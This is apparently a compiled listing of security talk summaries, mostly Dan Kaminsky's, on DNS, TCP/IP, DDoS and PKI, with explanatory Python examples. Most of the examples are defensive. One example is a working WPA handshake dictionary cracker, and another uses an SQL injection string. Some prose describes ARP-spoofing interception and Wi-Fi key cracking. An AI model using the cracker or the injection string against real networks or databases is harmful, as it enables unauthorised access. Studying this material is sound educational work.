This document discusses various techniques for manipulating TCP/IP packets to circumvent network restrictions or achieve unusual network effects. It proposes methods for instant port scanning, multicast-like transmission over unicast networks, sharing a public IP address among multiple private hosts, and establishing connections between hosts both behind NATs. The techniques rely on creatively exploiting redundancy and flexibility in the TCP/IP protocol stack.
This document discusses vulnerabilities in the design of the Domain Name System (DNS) and how those vulnerabilities can be exploited. Specifically, it describes how DNS caches, proxies, and routes can be used to map DNS servers and inject content into caches. It also summarizes methods for tunneling arbitrary content through DNS using techniques like modifying Time-To-Live values and encoding data in domain names or record types. Finally, it discusses some approaches for suppressing DNS tunnels, such as flagging unusually large or formatted traffic.
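The last point in that summary, flagging unusually large or oddly formatted DNS traffic, is easy to turn into a concrete check. The following is an added example written for this page, not code from the document it summarizes: it scores resolver query-log lines on label length, total name length, character entropy of the data-carrying labels, and the use of record types that can carry bulk data. The log format (client, query type, query name) and the sample lines are constructed for the example; the thresholds are starting points a practitioner would tune against their own traffic.

```python
import math
import re
from collections import Counter

# Constructed sample of resolver query-log lines (hypothetical "<client> <qtype> <qname>"
# format). The long hex labels under t.example.net imitate a DNS tunnel's encoded payload.
SAMPLE_LOG = """\
10.0.0.5 A www.example.com.
10.0.0.5 AAAA mail.example.com.
10.0.0.9 TXT 3b8f2a9c1d7e4f60a2b5c9d8e7f1a3b4c5d6e7f8.9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d.t.example.net.
10.0.0.9 TXT 7f1e2d3c4b5a69788796a5b4c3d2e1f0a1b2c3d4.e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0.t.example.net.
10.0.0.5 MX example.com.
10.0.0.9 NULL 0123456789abcdef0123456789abcdef01234567.t.example.net.
"""

TUNNEL_TYPES = {"TXT", "NULL", "CNAME"}  # record types commonly abused to carry bulk data

def shannon_entropy(s: str) -> float:
    """Bits per character of s; random-looking encoded payloads score near log2(alphabet)."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def score_query(qtype: str, qname: str) -> tuple[int, list[str]]:
    """Return (score, reasons) for one query; each tunnel-like property adds one point."""
    labels = [l for l in qname.rstrip(".").split(".") if l]
    reasons = []
    # Ordinary hostnames rarely exceed ~30 characters per label; tunnels pack data into them.
    longest = max((len(l) for l in labels), default=0)
    if longest > 30:
        reasons.append(f"long label ({longest} chars)")
    # Names approaching the 253-byte limit are another tell.
    if len(qname) > 100:
        reasons.append(f"long qname ({len(qname)} chars)")
    # Encoded data (hex/base32/base64) has high entropy; ignore the registered domain + TLD.
    data_labels = labels[:-2]
    if data_labels:
        ent = shannon_entropy("".join(data_labels))
        if ent > 3.5:
            reasons.append(f"high entropy ({ent:.2f} bits/char)")
    if qtype in TUNNEL_TYPES and longest > 30:
        reasons.append(f"bulk-capable record type {qtype}")
    return len(reasons), reasons

def flag_tunnel_queries(log_text: str, threshold: int = 2) -> list[dict]:
    """Parse log lines and return those whose score reaches the threshold."""
    flagged = []
    for line in log_text.splitlines():
        m = re.match(r"^(\S+)\s+(\S+)\s+(\S+)$", line.strip())
        if not m:
            continue
        client, qtype, qname = m.groups()
        score, reasons = score_query(qtype, qname)
        if score >= threshold:
            flagged.append({"client": client, "qtype": qtype, "qname": qname, "reasons": reasons})
    return flagged

if __name__ == "__main__":
    for hit in flag_tunnel_queries(SAMPLE_LOG):
        print(hit["client"], hit["qtype"], hit["qname"], "->", "; ".join(hit["reasons"]))
```

Requiring two independent signals before flagging keeps CDN and anti-spam lookups, which often have long but low-entropy labels, out of the alert stream; a tunnel that uses ordinary A-record lookups with short labels would need the volume-per-client angle that this scorer does not cover.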
Using techniques like ARP spoofing and NAT, it is possible to acquire an IP address and internet access on a network without a DHCP server. By intercepting traffic between an existing node and gateway, one can insert themselves as the "man in the middle" and route traffic through a NAT configuration using the hijacked node's IP address. This allows acquiring internet access without a free IP address by multiplexing sessions through the NAT. Scanrand port scanning observations can also reveal network topology details like firewall locations through analysis of TTL values.
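The TTL observation in that summary works because a RST injected by an in-path firewall is generated closer to the scanner than a SYN/ACK from the real host, so the two kinds of reply arrive with different remaining TTLs. The block below is an added example for this page, not scanrand's code: it infers the sender's initial TTL from the usual 64/128/255 starting values, converts each reply's TTL into a hop distance, and reports ports whose RSTs come from fewer hops away than the host's own SYN/ACKs. The response tuples are constructed data.

```python
from collections import defaultdict

# Constructed scan results for one target: (dst_port, tcp_flags, observed_ip_ttl).
# "SA" = SYN/ACK, "RA" = RST/ACK. Hypothetical values, not from the original talk.
RESPONSES = [
    (22,   "SA", 54),   # SYN/ACK from the host itself
    (80,   "SA", 54),
    (443,  "SA", 54),
    (23,   "RA", 59),   # RSTs with a larger remaining TTL: generated fewer hops away
    (135,  "RA", 59),
    (139,  "RA", 59),
    (8080, "RA", 54),   # host-generated RST for a closed port: same distance as SYN/ACKs
]

def initial_ttl(ttl: int) -> int:
    """Guess the sender's starting TTL: stacks initialise it to 64, 128 or 255."""
    for start in (64, 128, 255):
        if ttl <= start:
            return start
    raise ValueError("TTL out of range")

def hop_distance(ttl: int) -> int:
    """Hops the packet travelled, assuming the path is shorter than the gap between tiers."""
    return initial_ttl(ttl) - ttl

def infer_filtering(responses):
    """Group replies by (flags, hop distance); RSTs closer than the SYN/ACKs imply a filter."""
    by_kind = defaultdict(set)
    for port, flags, ttl in responses:
        by_kind[(flags, hop_distance(ttl))].add(port)
    host_dist = {d for (f, d) in by_kind if f == "SA"}
    findings = []
    for (flags, dist), ports in sorted(by_kind.items()):
        if flags == "RA" and host_dist and dist < min(host_dist):
            findings.append({
                "ports": sorted(ports),
                "hops_from_scanner": dist,
                "hops_closer_than_host": min(host_dist) - dist,
            })
    return findings

if __name__ == "__main__":
    for f in infer_filtering(RESPONSES):
        print(f"ports {f['ports']}: RST from {f['hops_from_scanner']} hops, "
              f"{f['hops_closer_than_host']} hops in front of the host")
```

The initial-TTL guess is the weak point: a 128-TTL host behind a 70-hop path would be misread as a 255-TTL sender. In practice the scanner also compares against its own traceroute distance to the target before trusting the inference.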
This document summarizes Dan Kaminsky's presentation on Black Ops of TCP/IP. It begins with an introduction of Kaminsky and the topics he plans to cover, including MD5 hashes, IP fragmentation, firewall/IPS fingerprinting, DNS poisoning, and scanning the internet. It then demonstrates how two webpages with different content can have the same MD5 hash due to collisions. It discusses using IP fragmentation and timing attacks to evade intrusion detection systems. It also describes techniques for fingerprinting firewalls and intrusion prevention systems based on their behavior in response to invalid traffic. Finally, it cautions against automatic shunning of IP addresses by security devices, to avoid accidentally blocking critical infrastructure such as the root DNS servers.
Dan Kaminsky introduces his new company Recursion Ventures and discusses session management on the web. He explains that the web was not designed for authenticated resources and credentials are easily accessible across sites due to issues with cookie-based session management. Kaminsky proposes using smarter string interpolation to allow developers to write code inline while preventing injections. He demonstrates a prototype called Interpolique that uses base64 encoding to sanitize variables before insertion into queries. This approach aims to make secure coding easier and mistakes immediately apparent.
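The base64 idea is worth seeing next to the bug it removes. The block below is an added example in the spirit of that approach, not the Interpolique prototype itself: the query is still built by inline string interpolation, but the variable is carried as base64, whose alphabet (letters, digits, `+`, `/`, `=`) cannot contain a quote, semicolon or comment marker, and the database decodes it. SQLite has no built-in base64 decoder, so the example registers one under the assumed name `b64d`; the table, rows and attacker input are constructed.

```python
import base64
import sqlite3

def b64d(s: str) -> str:
    """Server-side decoder; stands in for a database-provided from_base64() function."""
    return base64.b64decode(s).decode("utf-8")

def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.create_function("b64d", 1, b64d)   # assumed name for the decode function
    conn.executescript("""
        CREATE TABLE users (name TEXT, role TEXT);
        INSERT INTO users VALUES ('alice', 'admin'), ('bob', 'user');
    """)
    return conn

def vulnerable_query(conn, name: str):
    """Classic inline interpolation: the value is spliced straight into SQL syntax."""
    sql = f"SELECT name, role FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()

def encoded_query(conn, name: str):
    """Same inline style, but the value travels as base64 and is decoded by the database.
    Whatever the attacker typed, the literal between the quotes is [A-Za-z0-9+/=] only."""
    enc = base64.b64encode(name.encode("utf-8")).decode("ascii")
    sql = f"SELECT name, role FROM users WHERE name = b64d('{enc}')"
    return conn.execute(sql).fetchall()

INJECTION = "x' OR '1'='1"   # constructed attacker input

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", vulnerable_query(db, INJECTION))   # both rows leak
    print("encoded:   ", encoded_query(db, INJECTION))      # no such user, empty result
```

The mistake-visibility property the summary mentions follows from the same mechanism: if a developer forgets to encode, the query text contains a raw quote where only base64 should appear, which is easy to spot in a log or a grep over generated SQL.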
MD5 hashes are no longer secure due to the ability to create colliding files that have the same MD5 hash but different content and behavior. This allows an attacker to substitute a harmless file with a malicious one that cannot be detected by comparing MD5 hashes. While auditing and other defenses make exploitation difficult, the failure of MD5 to detect differences means it cannot reliably verify that a file is unchanged, or that properties such as executable behavior have been preserved. The full attack details have not been released but are more powerful than just appending data, allowing arbitrary manipulation of file content while preserving the MD5 hash.
The University of Edinburgh is undergoing a large project to reprocure its campus networking infrastructure. The existing network, which has grown organically over many years, contains equipment that is up to 20 years old and no longer meets the university's needs. After an internal review in 2014 recommended a new network be procured, the university embarked on a multi-stage competitive dialogue procurement process that is still ongoing. The process involves pre-market engagement, shortlisting bidders, and multiple rounds of dialogue and evaluation to refine solutions before selecting a final vendor. The procurement has proven to be a large undertaking but may result in a network solution tailored to the university's unique requirements.
From Kernel Space to User Heaven #NDH2k13 (Jaime Sánchez)
FROM KERNEL SPACE TO USER HEAVEN at NUIT DU HACK 2013 by JAIME SANCHEZ
More information at:
Twitter: @segofensiva
Website: http://www.seguridadofensiva.com
What if you could enqueue all your incoming and outgoing network connections from kernel space to user space? You could then develop offensive or defensive applications that modify headers and payloads in real time, detect unauthorized traffic such as DNS tunneling connections, or fool some well-known network tools. This will be demonstrated on Linux-powered devices. Some remote OS fingerprinting techniques, both active and passive, as implemented in tools like nmap, p0f, or vendor appliances, will also be explained, along with how to defeat them. The technique needs neither virtual machines nor kernel patches, and is highly portable to other platforms.
This document proposes adding Diffie-Hellman key exchange and digital signatures to the TCP three-way handshake to provide assured identity continuity for TCP connections even when network address translation (NAT) is used. It aims to prevent IP spoofing attacks by allowing endpoints to validate each other's identities during a TCP connection. The proposal outlines adding the cryptographic operations to the TCP handshake in a way that is incrementally deployable and backwards compatible without requiring any pre-existing relationship between endpoints. It also discusses some proof-of-concept implementation issues regarding using iptables and packet manipulation to verify signatures on TCP payloads.
DNS-OARC-36: Measurement of DNSSEC Validation with RSA-4096 (APNIC)
APNIC Chief Scientist Geoff Huston presents on why using larger keys for RSA in the context of DNSSEC impairs the robustness of DNSSEC validation for the signed name at DNS-OARC 36, held online from 29 to 30 November 2021.
The document discusses how insecure home automation systems can be hacked by analyzing the communication protocols and accessing devices remotely. It uses a hypothetical example of a hacker gaining control of all devices in hotel rooms by understanding the KNX protocol used and sending commands through unsecured IP connections. Better security practices like mutual authentication for device communication are suggested to prevent such attacks.
Type of DDoS attacks with hping3 example (Himani Singh)
This document summarizes common DDoS attack types and how to execute them using hping3 or other tools. It describes application layer attacks like HTTP floods, protocol attacks like SYN floods, volumetric attacks like ICMP floods, and reflection attacks. It then provides commands to execute various TCP, UDP, ICMP floods and other DDoS attacks using hping3 by spoofing addresses, modifying flags, and targeting ports. Layer 7 attacks exploiting HTTP requests are also summarized.
This document discusses DDoS attacks and mitigation methods. It begins by defining DDoS attacks as using multiple sources to overwhelm a target's availability, unlike a DoS attack, which uses a single source. Common DDoS attack types are then outlined, along with the costs and impacts of attacks for victims. The document also provides details on specific attack methods like SYN floods and reflection attacks using DNS and NTP, and recommended mitigation techniques including whitelisting, rate limiting, and fingerprinting. It concludes by emphasizing that DDoS attacks are easy to carry out and difficult to detect, while having significant negative effects on victims.
The presentation covers basic and advanced DDoS attacks: the tools, techniques and methods used to perform them, and how to prevent them using the mechanisms present in TCP/IP. Given the different network and application protocols in TCP/IP, it describes where in the communication process DDoS attacks become possible. Each attack is separately analyzed and described, and the corresponding defense technique is described using the same analogy. Our motto: if there is a DDoS case, there was a way to defend against it.
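The SYN flood and the mitigations named in the summaries above (rate limiting, whitelisting, fingerprinting) can be made concrete in a few dozen lines. The block below is an added example written for this page, not code from any of the presentations: it replays a constructed packet trace through two controls, a per-source token bucket and a half-open-connection monitor, and shows why the first one alone does not stop a spoofed flood. All addresses are from the RFC 5737 documentation ranges and the trace is synthetic.

```python
from collections import defaultdict

TARGET = "203.0.113.10"   # constructed victim address

def build_sample():
    """Constructed trace of (ts, src, sport, dst, dport, flags). One legitimate client
    completes five handshakes; then 300 SYNs from spoofed sources that never send the ACK."""
    pkts = []
    t = 0.0
    for i in range(5):
        pkts.append((t, "198.51.100.7", 40000 + i, TARGET, 80, "S"))
        pkts.append((t + 0.02, "198.51.100.7", 40000 + i, TARGET, 80, "A"))
        t += 0.1
    for i in range(300):
        pkts.append((t + i * 0.002, f"192.0.2.{i % 250 + 1}", 1024 + i, TARGET, 80, "S"))
    return sorted(pkts)

class HalfOpenMonitor:
    """Alert once more than `threshold` SYNs to one destination port are still waiting for
    their third-step ACK inside `window` seconds. Spoofed sources never complete the handshake,
    so half-open count rises with the flood regardless of how many source addresses it uses."""
    def __init__(self, window=1.0, threshold=100):
        self.window, self.threshold = window, threshold
        self.pending = {}   # (src, sport, dst, dport) -> SYN timestamp
        self.alerts = {}    # (dst, dport) -> (ts, half_open_count) at first alert

    def feed(self, ts, src, sport, dst, dport, flags):
        key = (src, sport, dst, dport)
        if flags == "S":
            self.pending[key] = ts
        elif flags == "A":
            self.pending.pop(key, None)          # handshake completed
        for k in [k for k, t0 in self.pending.items() if ts - t0 > self.window]:
            del self.pending[k]                  # give up on stale half-open entries
        per_dst = defaultdict(int)
        for (_, _, d, p) in self.pending:
            per_dst[(d, p)] += 1
        for dp, n in per_dst.items():
            if n > self.threshold and dp not in self.alerts:
                self.alerts[dp] = (ts, n)

class TokenBucket:
    """Per-source SYN rate limit: `rate` tokens per second, burst of `capacity`."""
    def __init__(self, rate=10.0, capacity=5):
        self.rate, self.capacity = rate, capacity
        self.state = {}     # src -> (tokens, last_ts)

    def allow(self, ts, src):
        tokens, last = self.state.get(src, (self.capacity, ts))
        tokens = min(self.capacity, tokens + (ts - last) * self.rate)
        if tokens >= 1:
            self.state[src] = (tokens - 1, ts)
            return True
        self.state[src] = (tokens, ts)
        return False

def analyze(packets):
    """Run both controls; return (alerts, number of SYNs the rate limiter dropped)."""
    mon, bucket, dropped = HalfOpenMonitor(), TokenBucket(), 0
    for ts, src, sport, dst, dport, flags in packets:
        if flags == "S" and not bucket.allow(ts, src):
            dropped += 1
            continue                             # dropped SYNs never reach the table
        mon.feed(ts, src, sport, dst, dport, flags)
    return mon.alerts, dropped

if __name__ == "__main__":
    alerts, dropped = analyze(build_sample())
    print("rate limiter dropped:", dropped)      # 0: each spoofed source sends only 1-2 SYNs
    print("half-open alerts:", alerts)           # target:80 flagged at 101 pending SYNs
```

Because the flood spreads 300 SYNs over 250 spoofed addresses, no single source ever exceeds the bucket and the rate limiter drops nothing; the half-open monitor fires within 0.2 s. That is the usual division of labour: per-source limits handle abusive but real clients, while SYN cookies or half-open accounting handle spoofed floods.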
1. The document provides steps to configure Avaya Spaces Calling on an Avaya IP Office system. It outlines 14 configuration steps including enabling UC profiles in IP Office, configuring the One-X portal, retrieving API keys from Avaya Spaces, enabling apps in Spaces, and configuring WebRTC settings.
2. Additional resources are listed to support Avaya Spaces Calling and IP Office subscriptions including documentation, videos, presentations, and technical support information.
3. The document concludes by thanking the reader and reiterating Avaya's focus on providing experiences that matter.
This document provides an introduction to peer-to-peer (P2P) computer networks. It discusses how P2P networks rely on the computing power and bandwidth of participants rather than centralized servers. The document then covers several examples of P2P networks including Gnutella and Kademlia, and discusses techniques like distributed hash tables, queries, and node joining/leaving.
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ... (OpenDNS)
The document discusses tracking infrastructure related to malware botnets through passive monitoring and active probing techniques. It provides an overview of tracking systems used to monitor the Gameover Zeus (GOZ) and newGOZ botnets. Specific case studies are described on tracking the fast flux proxy network of the Zbot botnet and predicting and identifying command and control domains generated by the domain generation algorithm (DGA) of the newGOZ botnet.
This document provides instructions for cracking wireless networks encrypted with WEP and WPA. It discusses the theoretical vulnerabilities in WEP that can be exploited to decrypt the network key. For WEP cracking, it describes how to use airodump to capture initialization vectors (IVs), aircrack to crack the key using the IVs, and aireplay to force traffic if needed. It also covers differences between WPA and WEP, capturing the handshake for WPA networks, and dictionary attacks to crack weak WPA passwords.
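The WPA dictionary attack that summary ends with is worth seeing end to end, since it explains both why the handshake capture is needed and why a weak passphrase falls. The block below is an added example written for this page, not code from the document or from the aircrack-ng tools: it derives the PMK with PBKDF2-HMAC-SHA1 over the SSID, expands it into the PTK with the 802.11i PRF using both MAC addresses and both nonces, and recomputes the WPA2 EAPOL MIC for each candidate passphrase until one matches. The SSID, MAC addresses, nonces, EAPOL frame and passphrase are all constructed; the only captured secret a real attacker has is the MIC, which the example produces with `captured_mic()` to stand in for the sniffed frame.

```python
import hashlib
import hmac

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]

def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, both MACs and both handshake nonces, each pair ordered min || max.
    The first 16 bytes (KCK) are identical whether PRF-384 (CCMP) or PRF-512 (TKIP) is used."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)

def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2/CCMP key MIC: HMAC-SHA1 under the KCK over the EAPOL frame with its MIC field
    zeroed, truncated to 16 bytes. (WPA/TKIP uses HMAC-MD5 instead.)"""
    return hmac.new(kck, eapol, hashlib.sha1).digest()[:16]

def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, mic, wordlist):
    """Recompute the MIC for every candidate passphrase; a match recovers the passphrase."""
    for cand in wordlist:
        ptk = wpa_ptk(wpa_pmk(cand, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol), mic):
            return cand
    return None

# Constructed handshake material standing in for a captured 4-way handshake.
SSID = "CoffeeShop"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL = bytes.fromhex("0103005f02010a00") + bytes(91)   # message 2, MIC field zeroed
TRUE_PASSPHRASE = "password123"                          # constructed weak passphrase

def captured_mic() -> bytes:
    """What the sniffer sees: the MIC the real client computed with the real passphrase."""
    ptk = wpa_ptk(wpa_pmk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL)

if __name__ == "__main__":
    found = crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL, captured_mic(),
                            ["letmein", "qwerty", "password123", "hunter2"])
    print("recovered passphrase:", found)
```

The cost per guess is dominated by the 4096 PBKDF2 rounds, which is why the attack is a dictionary attack rather than brute force, and why the SSID acts as a per-network salt against precomputed tables. The `wpa_pmk` function can be checked against the 802.11i Annex H test vector: passphrase `password` with SSID `IEEE` yields PMK `f42c6fc5...a12e`.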
2017 JavaOne Deconstructing and Evolving REST Security (David Blevins)
The learning curve for security is severe and unforgiving. Specifications promise infinite flexibility, habitually give old concepts new names, offer endless extensions, and almost seem designed to deliberately confuse. With an eye on architectural impact, actual HTTP messages, and an aggressive distaste for fancy terminology, this session delves into OAuth 2.0 as it pertains to REST and shows how it falls into two camps: stateful and stateless. It then explores a competing Amazon-style approach called HTTP Signatures, ideal for B2B APIs. Finally, it discusses a new internet draft launched this year that combines them both into a two-factor system that could provide a one-stop shop for business as well as mobile REST scenarios.
Kafka & Storm - FifthElephant 2015 by @bhaskerkode, Helpshift (Bhasker Kode)
The document discusses how Kafka's key distinguishing feature is its published protocol specification that defines how clients communicate with Kafka brokers. This allows different clients to integrate with Kafka by simply implementing the protocol over TCP, without relying on a specific client library. It also enables the ecosystem to develop rapidly due to wide adoption. The protocol focuses on efficiency through techniques like zero-copy transfer of message data directly from kernel space to sockets.
The document discusses various attacks that are possible against the AoE (ATA over Ethernet) storage protocol due to its lack of authentication and security features. Some key attacks mentioned include replay attacks, unauthenticated disk access by reading and writing directly to disks, creating an AoE proxy to reroute traffic, and denial of service attacks. The document warns that AoE deployments could be vulnerable if not properly segmented from untrusted networks.
The document provides an overview of how the internet works by discussing various networking concepts and components involved in connecting devices and routing traffic from local networks to external networks and servers. It explains protocols like TCP, UDP, and IP and networking devices like routers, switches, firewalls, proxies, load balancers and VPNs and how they facilitate communication and security. The document is intended to help understand error logs and troubleshoot network issues by providing context on the underlying infrastructure.
This document describes network address translation (NAT) and different NAT types. It includes a course on Cisco CCNA about NAT taught at Tehran Institute of Technology. The course covers introduction to NAT and private vs public addresses. It then describes static NAT, dynamic NAT, and port address translation. The document provides examples of configuring static and dynamic NAT on routers to allow internal hosts to access the internet using public IP addresses.
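The three NAT types in that summary differ in how a translation is created and, more importantly for security, in what an unsolicited packet from the outside can reach. The block below is an added example for this page, not from the course: a small translation-table model (not a router implementation) with static 1:1 mappings, a dynamic pool, and port address translation (overload). The addresses are assumed values from the RFC 5737 documentation ranges and the private 192.168.1.0/24 block.

```python
class Nat:
    """Toy translation table modelling static NAT, dynamic NAT and PAT (overload)."""
    def __init__(self, static=None, pool=None, overload_ip=None):
        self.static = dict(static or {})   # inside -> public, fixed 1:1 (static NAT)
        self.pool = list(pool or [])       # free public addresses (dynamic NAT)
        self.overload_ip = overload_ip     # one shared public address (PAT / overload)
        self.dynamic = {}                  # inside -> public address currently leased
        self.pat = {}                      # public port -> (inside ip, inside port)
        self.next_port = 1024

    def outbound(self, src_ip, src_port):
        """Translate an inside (ip, port) to its outside (ip, port), creating state if needed."""
        if src_ip in self.static:
            return self.static[src_ip], src_port
        if src_ip not in self.dynamic and self.pool:
            self.dynamic[src_ip] = self.pool.pop(0)      # lease one public address per host
        if src_ip in self.dynamic:
            return self.dynamic[src_ip], src_port
        if self.overload_ip is None:
            raise RuntimeError("dynamic pool exhausted and no overload address configured")
        for pport, inner in self.pat.items():            # reuse an existing PAT entry
            if inner == (src_ip, src_port):
                return self.overload_ip, pport
        pport, self.next_port = self.next_port, self.next_port + 1
        self.pat[pport] = (src_ip, src_port)             # many hosts share one address
        return self.overload_ip, pport

    def inbound(self, dst_ip, dst_port):
        """Map a packet arriving from outside to an inside host, or None to drop it."""
        for inside, pub in {**self.static, **self.dynamic}.items():
            if pub == dst_ip:
                return inside, dst_port    # 1:1 mappings expose every port of the host
        if dst_ip == self.overload_ip:
            return self.pat.get(dst_port)  # PAT admits only replies to existing entries
        return None

if __name__ == "__main__":
    nat = Nat(static={"192.168.1.10": "203.0.113.10"},
              pool=["203.0.113.20"], overload_ip="203.0.113.2")
    for host in ("192.168.1.10", "192.168.1.11", "192.168.1.12", "192.168.1.13"):
        print(host, "->", nat.outbound(host, 51000))
    print("inbound to static host port 22:", nat.inbound("203.0.113.10", 22))
    print("inbound unsolicited to PAT address:", nat.inbound("203.0.113.2", 9999))
```

The last two lines are the point a security reviewer cares about: a static mapping makes the inside host reachable on every port from the internet unless an access list on the outside interface restricts it, whereas PAT only forwards traffic that matches a translation an inside host already opened. Dynamic NAT sits in between and also fails closed when the pool is exhausted.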
A small presentation about the concepts behind real-time multiplayer games and a glimpse on how to implement them with Godot Engine.
See working demo and source code: https://github.com/Faless/godotcon-multiplayer
This gives an overall idea about wireshark design and how to capture packets using wireshark, tcpdump and tshark. It also covers basics behind measuring network performance and tools to use such as bmon and iperf.
Each day millions of Internet requests are made to dynamically changing Cryptolocker domains. And it only takes one successful connection from a malware-infected system to the botnet controller for your files to end up encrypted and held for ransom.
So how does Cryptolocker actually work? What is the best way to block it? And what implications does this have for security methods going forward?
In this webcast, you will learn:
-What steps are involved in a Cryptolocker attack
-How Domain Generation Algorithms enable it to evade most threat detection methods
-Why leveraging our global intelligence has been effective in containing Cryptolocker
-What you can do to avoid becoming a victim
This document summarizes Dan Kaminsky's talk on the weaknesses of the X.509 public key infrastructure (PKI) system. Kaminsky argues that X.509 cannot adequately exclude unauthorized certificate authorities, delegate authority without pain, or protect against cryptographic vulnerabilities like insecure hashing functions still in use. Specifically, he notes one of Verisign's root certificates is self-signed using the insecure MD2 hashing algorithm, allowing for the potential creation of a malicious intermediate certificate using a preimage attack.
A Technical Dive into Defensive Trickery (Dan Kaminsky)
This document discusses various techniques for improving security and making it easier to deploy. It begins by introducing Dan Kaminsky and the goal of challenging assumptions. It then discusses how security is often hard to implement due to challenges like DDoS attacks being hard to remediate, TLS being difficult to deploy properly, and data loss prevention during attacks. The document proposes several solutions to these challenges, including Overflowd to help trace DDoS attacks, JFE to automatically provision TLS for all network services, and Ratelock to enforce access policies like rate limits in the cloud even if servers are compromised. It argues that moving enforcement to the cloud can improve security. The document concludes by noting that running code safely through sandboxing is also difficult but
This document discusses making security easier and more practical. It argues that security needs to move beyond just being possible to actually being practical. It highlights several challenges, including that human factors are important but often overlooked. It proposes some solutions like making encryption and secure protocols the default instead of optional, and using cloud infrastructure to improve isolation and make compromises more survivable. The overall message is that the security community needs to come together to actually fix issues and make real improvements instead of just discussing theoretical possibilities.
This document discusses improving security by addressing issues with random number generation and timing attacks. It proposes using a random delay at the network interface level to obscure timing signals and prevent timing attacks. It also suggests revisiting an old technique called TrueRand that uses differences between a CPU's clock and other clocks/timers as a source of entropy for random number generation. The document advocates a pragmatic approach of deploying imperfect but effective defenses rather than insisting on perfection.
The document discusses research on chickens and their behavior. It explores various studies on chicken chickens and chickens chickens. It also lists several key sources that have looked at chickens chickens chickens and chickens chickens chickens chickens.
The document summarizes Dan Kaminsky's planned talks and demonstrations at Black Hat 2006. Some key points include:
- Enforcing network neutrality through detecting non-neutral networks using techniques like active network probing and analyzing TCP bandwidth.
- Findings from scanning over 2.4 million SSL servers, including many servers responding on port 443 without SSL enabled and variability in certificates served from the same IP.
- Demonstrating ways to securely login to online applications from an insecure home page using iframes to initialize SSL.
This document summarizes Dan Kaminsky's talk on reviewing web security and design. The talk covered three main points:
1. Bugs in the DNS system and same origin policy allow an attacker to bypass firewalls and access internal networks by manipulating domain name resolutions. This is known as DNS rebinding.
2. The attacker can use DNS rebinding to direct a browser to load content from both external and internal IP addresses, treating them as the same origin. This allows scripting cross-origin requests to internal resources.
3. Kaminsky demonstrated how an attacker could implement a proxy and tunneling system to provide arbitrary TCP/IP access to internal networks using only a compromised browser. The talk warned that this
This document summarizes a talk about DNS injection by internet service providers (ISPs) showing ads for typosquatted domains. The speaker demonstrates how a malicious subdomain injected by an ISP could steal cookies, spoof any website, and even inject content into the parent domain via script. Though the immediate risk was fixed, the speaker argues that ISP interception undermines web security by allowing arbitrary content injection and bypass of encryption. Legal restrictions are needed to establish that ISPs cannot alter or inject traffic.
The document discusses securing web applications. It argues that traditional approaches like blaming developers or banning third-party cookies are not effective solutions. Adding random tokens manually to URLs is difficult for developers. Using the referer header is unreliable due to inconsistencies across browsers and plugins. The origin header has similar problems. The document proposes an "interpreter suicide" approach where JavaScript detects cross-site navigation and prevents further execution to block attacks. This provides a client-side way to enforce session context without requiring manual token management.
This document discusses using context free grammars and XML to represent and manipulate symbols from data in order to generate fuzzed or corrupted inputs. It begins by introducing the concept of using the Sequitur algorithm to extract a hierarchical context free grammar from input data. This extracted grammar represents the patterns and symbols in the data. The document then discusses representing this grammar as XML for easier analysis and modification. It proposes using the symbol structure to guide a fuzzing technique called the CFG9000, which corrupts input data by shuffling, repeating, dropping or uniformly corrupting symbols. Examples of fuzzed output are shown for code and an XML document from Wireshark. The goal is to fuzz at the symbolic level rather than just corrup
DNS is critical infrastructure that everything on the internet relies on, but it is inherently insecure. A significant vulnerability was found in 2008 that allowed cache poisoning attacks. While patching efforts were largely successful, some servers remain unpatched and attacks have been detected in the wild. The vulnerability illustrates how DNS insecurity can undermine higher-level security systems. DNS is difficult to secure due to its need to scale across organizational boundaries, but securing it through technologies like DNSSEC could help address lingering risks.
This document summarizes Dan Kaminsky's 2008 talk at Black Hat about a vulnerability he discovered in the Domain Name System (DNS) that allowed attackers to spoof DNS responses. The vulnerability, known as DNS cache poisoning, could allow attackers to redirect traffic to malicious websites by guessing the random transaction ID associated with DNS queries. Kaminsky worked with DNS developers and organizations to coordinate a massive patching effort that updated DNS servers for over 120 million users within a few weeks. His talk analyzed the impact of the patching and discussed the technical details of how the vulnerability worked.
Yet Another Dan Kaminsky Talk (Black Ops 2014) - Dan Kaminsky
The document is a transcript of a talk by Dan Kaminsky about various cybersecurity topics. Some key points:
- Hard drives are essentially their own computers with direct access to system memory, so malware on a hard drive can be highly persistent.
- Random number generators are often insecure by default due to lack of entropy. This leads to issues like easily crackable passwords.
- A new library called Liburandy aims to make random numbers secure by default by hijacking standard functions and backing them with cryptographically secure sources of randomness.
- Humans are better at remembering stories than random bits, so representing passwords as memorable stories could improve security and usability.
